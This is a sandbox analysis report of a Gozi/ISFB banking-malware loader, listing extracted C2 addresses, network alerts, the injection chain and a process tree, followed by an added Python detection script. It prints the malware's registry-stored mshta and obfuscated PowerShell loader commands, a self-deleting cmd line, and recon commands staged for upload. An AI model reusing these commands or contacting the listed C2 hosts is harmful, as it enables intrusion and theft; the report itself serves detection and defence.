Analysis

max time kernel: 4294180s
max time network: 120s
platform: windows7_x64
resource: win7-20220311-en
submitted: 22/03/2022, 15:41

Static task: static1
Behavioral task: behavioral1
  Sample: d41d05cc157f874f89c574c74c0e2c58.exe
  Resource: win7-20220311-en

General

Target: d41d05cc157f874f89c574c74c0e2c58.exe
Size: 739KB
MD5: d41d05cc157f874f89c574c74c0e2c58
SHA1: 1e0df409d72db144f570b9d8410b544c8670e64d
SHA256: 0d4702dec67009d0728ce6da88bd91bf5e70a526cf0688cc7c7586937cf06cb2
SHA512: fa36e9217d4af43d14870e0fdc380e3ce25674ca0ff55faba604e3b025be06e9c01fadb2807a6809962defc353ca21ea85218115e3624961d6989484115f20ba
Malware Config

Extracted
  family: gozi_ifsb
  botnet: 777999
  c2: config.edge.skype.com, 146.70.35.138, 146.70.35.142
  base_path: /phpadmin/
  build: 250225
  exe_type: loader
  extension: .src
  server_id: 50

Extracted
  family: gozi_ifsb
  botnet: 777999
  c2: config.edge.skype.com, 67.43.234.14, 67.43.234.37, 67.43.234.47
  base_path: /images/
  build: 250225
  exe_type: worker
  extension: .src
  server_id: 50

Two configurations were extracted because the sample carries both a loader and a worker module (exe_type); they share botnet 777999, build 250225 and server_id 50 but use separate C2 address pools and base paths. config.edge.skype.com is a legitimate Microsoft endpoint that Gozi/ISFB configurations routinely list ahead of the real servers, so treat the IP addresses and base paths as the blocking indicators and do not block that hostname on the strength of this entry alone.
Signatures

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Data Exfil

The two Payload Request alerts record fetches of cook32.rar and cook64.rar, consistent with the loader pulling 32-bit and 64-bit follow-on modules; the Beacon and Data Exfil alerts cover the check-in and the upload of the collected recon output.
Deletes itself 1 IoCs
pid    Process
1912   cmd.exe

Drops file in System32 directory 1 IoCs
description                   ioc                                                                                                                                         Process
File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
The recorded path contains an unexpanded %ProgramData% component under System32, so this is the sandbox's literal file-open record rather than a confirmed dropped payload; verify on a live host before using the path as an indicator.

Suspicious use of SetThreadContext 5 IoCs
pid    Process                                 target pid  procid_target
1608   d41d05cc157f874f89c574c74c0e2c58.exe   976         27
532    powershell.exe                          1192        6
1192   Explorer.EXE                            1912        38
1912   cmd.exe                                 1604        40
1192   Explorer.EXE                            1452        52
Read together with the process tree, this is the injection path: the loader (1608) into its second copy (976), powershell.exe (532) into Explorer.EXE (1192), and the injected Explorer into the self-delete cmd.exe (1912, which in turn injects PING.EXE 1604) and into the 32-bit cmd.exe (1452).

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
The second sentence is the sandbox's generic description for this signature. Nothing else in this report shows encryption activity, and the extracted configuration identifies the family as Gozi/ISFB (loader and worker modules), so the ransomware attribution is not supported for this sample.
Discovers systems in the same network 1 TTPs 3 IoCs
pid    Process
1068   net.exe
532    net.exe
916    net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs
pid    Process
1184   tasklist.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid    Process
1308   systeminfo.exe

Modifies Internet Explorer settings 1 IoCs
description  ioc                                                                                                       Process
Key created  \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
This key is created by the mshta.exe host itself (the inline HTA runs in the Internet Explorer engine). The registry location this sample actually uses for its script stages is HKCU\Software\AppDataLow\Software\Microsoft\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71 (values OperatorMask and ClassControl), as the mshta and powershell command lines in the process tree show.

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs
pid    Process
1604   PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid    Process
1604   PING.EXE

Suspicious behavior: EnumeratesProcesses 5 IoCs
pid    Process
976    d41d05cc157f874f89c574c74c0e2c58.exe
532    powershell.exe
1192   Explorer.EXE (3 records)

Suspicious behavior: MapViewOfSection 4 IoCs
pid    Process
532    powershell.exe
1192   Explorer.EXE (2 records)
1912   cmd.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs
description              pid    Process
Token: SeDebugPrivilege  532    powershell.exe
Token: SeDebugPrivilege  1184   tasklist.exe

Suspicious use of SetWindowsHookEx 1 IoCs
pid    Process
1192   Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs
The 64 records collapse to 17 distinct writer/target pairs; count is the number of WriteProcessMemory records for that pair.
pid    Process                                 target pid  procid_target  count
1608   d41d05cc157f874f89c574c74c0e2c58.exe   976         27             6
1928   mshta.exe                               532         31             3
532    powershell.exe                          1452        34             3
1452   csc.exe                                 1616        35             3
532    powershell.exe                          1696        36             3
1696   csc.exe                                 1344        37             3
532    powershell.exe                          1192        6              3
1192   Explorer.EXE                            1912        38             6
1912   cmd.exe                                 1604        40             6
1192   Explorer.EXE                            1652        43             3
1652   cmd.exe                                 1796        45             3
1192   Explorer.EXE                            908         47             3
1192   Explorer.EXE                            1708        48             3
1708   cmd.exe                                 1308        50             3
1192   Explorer.EXE                            1452        52             7
1192   Explorer.EXE                            1224        54             3
1192   Explorer.EXE                            1812        56             3
The pairs whose target also appears under SetThreadContext (976, 1192, 1912, 1604 and 1452) are the injection path; the remaining three-record pairs correspond to ordinary process creation by the parent.
Processes

How the tree reads: the dropped loader (PID 1608) starts a second copy of itself (PID 976) and injects into it. mshta.exe (PID 1928) runs an inline HTA that eval()s script read from the registry value HKCU\Software\AppDataLow\Software\Microsoft\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71\OperatorMask; that script launches powershell.exe (PID 532), which hides gp and iex behind new-alias, decodes the ClassControl value of the same key and executes it, compiles two inline assemblies with csc.exe/cvtres.exe (the footprint of Add-Type), and injects into Explorer.EXE (PID 1192). The injected Explorer then spawns the ping-and-delete cmd.exe (PID 1912) that removes the loader from disk, and a chain of cmd /C recon commands whose output is appended to %TEMP%\B64C.bin1 (the external-IP lookup goes to %TEMP%\71B8.bi1); the last step copies B64C.bin1 to B64C.bin and deletes the staging file. The sandbox reuses PIDs: 532, 1452, 1652, 1764, 1912 and 1068 each appear more than once for different processes, so match on image and command line rather than PID alone.

PID 1192  C:\Windows\Explorer.EXE
  cmdline: C:\Windows\Explorer.EXE
  tags: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

  PID 1608  C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
    tags: Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory

    PID 976  C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
      tags: Suspicious behavior: EnumeratesProcesses

  PID 1928  C:\Windows\System32\mshta.exe
    cmdline: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Te7a='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Te7a).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71\\\OperatorMask'));if(!window.flag)close()</script>"
    tags: Modifies Internet Explorer settings; Suspicious use of WriteProcessMemory

    PID 532  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sjndtifo -value gp; new-alias -name hlshhlju -value iex; hlshhlju ([System.Text.Encoding]::ASCII.GetString((sjndtifo "HKCU:Software\AppDataLow\Software\Microsoft\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71").ClassControl))
      tags: Drops file in System32 directory; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

      PID 1452  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tmcimu1x.cmdline"
        tags: Suspicious use of WriteProcessMemory

        PID 1616  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDC3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDDB2.tmp"

      PID 1696  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0tccqdc.cmdline"
        tags: Suspicious use of WriteProcessMemory

        PID 1344  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE4F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDE4E.tmp"

  PID 1912  C:\Windows\System32\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
    tags: Deletes itself; Suspicious use of SetThreadContext; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory

    PID 1604  C:\Windows\system32\PING.EXE
      cmdline: ping localhost -n 5
      tags: Runs ping.exe; Suspicious behavior: CmdExeWriteProcessMemorySpam

  PID 1652  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\71B8.bi1"
    tags: Suspicious use of WriteProcessMemory

    PID 1796  C:\Windows\system32\nslookup.exe
      cmdline: nslookup myip.opendns.com resolver1.opendns.com

  PID 908  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\71B8.bi1"

  PID 1708  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
    tags: Suspicious use of WriteProcessMemory

    PID 1308  C:\Windows\system32\systeminfo.exe
      cmdline: systeminfo.exe
      tags: Gathers system information

  PID 1452  C:\Windows\syswow64\cmd.exe
    cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

  PID 1224  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 1812  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 1068  C:\Windows\system32\net.exe
      cmdline: net view
      tags: Discovers systems in the same network

  PID 1764  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 1584  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 1652  C:\Windows\system32\nslookup.exe
      cmdline: nslookup 127.0.0.1

  PID 2040  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 1008  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 1184  C:\Windows\system32\tasklist.exe
      cmdline: tasklist.exe /SVC
      tags: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken

  PID 1540  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 600  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 532  C:\Windows\system32\driverquery.exe
      cmdline: driverquery.exe

  PID 1788  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 1976  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 1912  C:\Windows\system32\reg.exe
      cmdline: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

  PID 1568  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 1068  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 432  C:\Windows\system32\net.exe
      cmdline: net config workstation

      PID 1764  C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 config workstation

  PID 108  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 1704  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 764  C:\Windows\system32\nltest.exe
      cmdline: nltest /domain_trusts

  PID 2004  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 1620  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 1460  C:\Windows\system32\nltest.exe
      cmdline: nltest /domain_trusts /all_trusts

  PID 1576  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 1844  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 532  C:\Windows\system32\net.exe
      cmdline: net view /all /domain
      tags: Discovers systems in the same network

  PID 1240  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 1680  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

    PID 916  C:\Windows\system32\net.exe
      cmdline: net view /all
      tags: Discovers systems in the same network

  PID 2032  C:\Windows\system32\cmd.exe
    cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

  PID 864  C:\Windows\system32\cmd.exe
    cmdline: cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\B64C.bin1 > C:\Users\Admin\AppData\Local\Temp\B64C.bin & del C:\Users\Admin\AppData\Local\Temp\B64C.bin1"
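As an added example (not part of the sandbox report and not vendor tooling), the following Python turns the process chain above into detection logic over process-creation events. The ProcEvent schema is an assumption, not a Sysmon or EDR format; the EVENTS list is constructed from the command lines and PIDs in the tree, and the benign `dir` event (PID 4242) is a constructed control that shares the parent and the redirection into %TEMP% but is not a recon tool. The rules cover the four stages a responder would want to catch: an inline HTA regread()ing and eval()ing a value under AppDataLow, powershell aliasing iex/gp to run a registry-stored stage, the injected Explorer spawning recon commands redirected into %TEMP%, and the ping-and-delete self-removal.

```python
r"""Flag the Gozi/ISFB process chain seen in this report from process-creation events.

Added example, not sandbox or vendor code.  ProcEvent is an assumed minimal
schema (not Sysmon/EDR); EVENTS is constructed from the report's process tree.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def mshta_registry_eval(e, parent):
    """Inline HTA (nothing on disk) that regread()s a value under AppDataLow and eval()s it."""
    c = e.cmdline.lower()
    return (_basename(e.image) == "mshta.exe" and "about:<hta:application>" in c
            and "regread(" in c and "appdatalow" in c)


def powershell_alias_iex(e, parent):
    """new-alias used to disguise iex, then a registry property under AppDataLow executed."""
    return (_basename(e.image) == "powershell.exe"
            and re.search(r"(?i)new-alias\b.*-value\s+iex\b", e.cmdline) is not None
            and "appdatalow" in e.cmdline.lower())


# Recon tool followed by redirection into a file under ...\Temp\ (the B64C.bin1 / 71B8.bi1 pattern).
RECON_TO_TEMP = re.compile(
    r"(?i)\b(systeminfo|net\s+view|net\s+config|nltest|tasklist|driverquery"
    r"|nslookup|reg(?:\.exe)?\s+query)\b.*>\s*\S*\\Temp\\")


def recon_to_temp_from_explorer(e, parent):
    """cmd /C <recon tool> > %TEMP%\\... launched by Explorer.EXE, the injection host here."""
    return (_basename(e.image) == "cmd.exe" and parent is not None
            and _basename(parent.image) == "explorer.exe"
            and RECON_TO_TEMP.search(e.cmdline) is not None)


def recon_output_collect(e, parent):
    """Final step: type <temp staging file> > <temp file> & del <staging file>."""
    pat = r"(?i)\btype\s+\S*\\Temp\\\S+\s*>\s*\S*\\Temp\\\S+.*&\s*del\b"
    return _basename(e.image) == "cmd.exe" and re.search(pat, e.cmdline) is not None


def self_delete_via_ping(e, parent):
    """ping localhost -n N && del <path>: wait, then remove the dropped loader."""
    pat = r"(?i)\bping\s+localhost\s+-n\s+\d+\s*&&\s*del\s+"
    return _basename(e.image) == "cmd.exe" and re.search(pat, e.cmdline) is not None


RULES = (mshta_registry_eval, powershell_alias_iex, recon_to_temp_from_explorer,
         recon_output_collect, self_delete_via_ping)


def scan(events):
    """Return sorted (rule_name, pid) pairs for every event some rule matches.

    Parents are resolved by PID for brevity; the report itself shows PID reuse
    (532, 1452, 1652, ...), so real telemetry should resolve by process GUID."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        hits.extend((rule.__name__, e.pid) for rule in RULES if rule(e, parent))
    return sorted(hits)


# Constructed from the report's process tree; ppid 0 for Explorer is a placeholder.
T = r"C:\Users\Admin\AppData\Local\Temp"
EVENTS = [
    ProcEvent(1192, 0, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(1928, 1192, r"C:\Windows\System32\mshta.exe",
              r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Te7a='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Te7a).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71\\\OperatorMask'));if(!window.flag)close()</script>"'''),
    ProcEvent(532, 1928, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sjndtifo -value gp; new-alias -name hlshhlju -value iex; hlshhlju ([System.Text.Encoding]::ASCII.GetString((sjndtifo "HKCU:Software\AppDataLow\Software\Microsoft\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71").ClassControl))'),
    ProcEvent(1912, 1192, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "' + T + r'\d41d05cc157f874f89c574c74c0e2c58.exe"'),
    ProcEvent(1652, 1192, r"C:\Windows\system32\cmd.exe",
              r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > ' + T + r'\71B8.bi1"'),
    ProcEvent(1708, 1192, r"C:\Windows\system32\cmd.exe", r'cmd /C "systeminfo.exe > ' + T + r'\B64C.bin1"'),
    ProcEvent(1812, 1192, r"C:\Windows\system32\cmd.exe", r'cmd /C "net view >> ' + T + r'\B64C.bin1"'),
    ProcEvent(864, 1192, r"C:\Windows\system32\cmd.exe",
              r'cmd /U /C "type ' + T + r'\B64C.bin1 > ' + T + r'\B64C.bin & del ' + T + r'\B64C.bin1"'),
    # Constructed benign control: same parent and redirection into %TEMP%, but no recon tool.
    ProcEvent(4242, 1192, r"C:\Windows\system32\cmd.exe", r'cmd /C "dir C:\Users\Admin\Documents > ' + T + r'\list.txt"'),
]

if __name__ == "__main__":
    for rule, pid in scan(EVENTS):
        print(f"{rule:28s} pid={pid}")
```

Running the block prints one line per hit: the mshta stage (1928), the powershell stage (532), the self-delete cmd (1912), the three recon commands (1652, 1708, 1812) and the final collect-and-delete (864); the `dir` control produces nothing. The recon rule requires Explorer.EXE as parent because that is the injection host in this report; where Gozi injects into a different host, relax that check and rely on the recon-plus-redirect pattern alone.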